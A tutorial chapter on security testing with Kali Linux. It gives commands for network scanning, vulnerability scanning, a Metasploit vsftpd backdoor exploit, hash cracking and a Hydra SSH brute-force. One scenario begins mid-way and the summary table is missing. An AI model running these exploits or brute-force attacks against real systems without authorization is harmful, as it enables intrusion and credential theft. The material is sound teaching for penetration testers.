Using Kali Linux for Security Testing

📙 Chapter 3: Real-World Security Testing Scenarios

🧠 Introduction

In the realm of cybersecurity, theoretical knowledge is invaluable, but practical experience is paramount. This chapter delves into real-world security testing scenarios using Kali Linux, providing hands-on examples that mirror actual penetration testing engagements. By exploring these scenarios, you'll gain insights into the methodologies, tools, and techniques employed by professionals to identify and exploit vulnerabilities in various systems.​

🛠️ Scenario 1: Network Reconnaissance and Scanning

Objective:

Gather information about a target network to identify live hosts, open ports, and services.​

Tools:

• Nmap
• Netdiscover​

Steps:

1. Identify Live Hosts:

Use Netdiscover to find active hosts on the network.

bash

netdiscover -r 192.168.1.0/24

2. Scan for Open Ports and Services:

Utilize Nmap for a comprehensive scan.

bash

nmap -sS -sV -O 192.168.1.100

• -sS: TCP SYN scan
• -sV: Service version detection
• -O: OS detection​

3. Analyze Results:

Review the output to identify potential entry points.

🛠️ Scenario 2: Vulnerability Assessment

Objective:

Identify known vulnerabilities in web applications and services.​

Tools:

• Nikto
• OpenVAS​

Steps:

1. Web Server Scanning with Nikto:

Scan a web server for common vulnerabilities.

bash

nikto -h http://192.168.1.100

2. Comprehensive Scanning with OpenVAS:

Set up and run OpenVAS for an in-depth assessment.

bash

openvas-setup

openvas-start

Access the web interface at https://127.0.0.1:9392 to initiate scans.

3. Interpret Findings:

Analyze the reports to prioritize vulnerabilities for exploitation.

🛠️ Scenario 3: Exploitation Using Metasploit

Objective:

Exploit a known vulnerability to gain unauthorized access.​

Tools:

• Metasploit Framework​

Steps:

1. Launch Metasploit:

bash

msfconsole

2. Search for Exploit:

Find an exploit for the target service.

bash

search vsftpd

3. Use the Exploit:

bash

use exploit/unix/ftp/vsftpd_234_backdoor

4. Set Target Details:

bash

set RHOST 192.168.1.100

set RPORT 21

5. Execute the Exploit:

bash

exploit

6. Post-Exploitation:

Upon successful exploitation, gather system information and establish persistence if necessary.

🛠️ Scenario 4: Password Cracking

Objective:

Crack password hashes to gain unauthorized access.​

Tools:

• John the Ripper
• Hydra​

Steps:

1. Cracking Hashes with John the Ripper:

Assuming you have a file hashes.txt containing password hashes:

bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

2. Brute-Force Attack with Hydra:

Attempt to crack SSH credentials:

bash

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

3. Analyze Results:

Review cracked passwords and assess the impact.

✅ Scenario 5: Wireless Network Penetration Testing (continued)

Step 5: Evaluate Security

After running Aircrack-ng, if the password is cracked, review the results:

• If successful: Test network defenses against unauthorized access.
• If unsuccessful: Recommend WPA3 upgrade or stronger passphrase policies.

🔐 Important Note: Always conduct wireless testing only on networks you own or have explicit permission to assess.

📊 Summary Table of Scenarios and Tools

🧠 Conclusion

This chapter illustrated practical, real-world security testing scenarios using Kali Linux. From initial reconnaissance to post-exploitation analysis, each example mirrors professional workflows followed during actual penetration testing engagements. By practicing these scenarios in a controlled lab environment, learners can:

• Develop confidence in using Kali Linux tools
• Understand the ethical hacker’s mindset
• Simulate realistic attack chains while staying within legal boundaries

As we progress, we’ll explore scripting, automation, and reporting techniques to make your assessments more efficient and professional.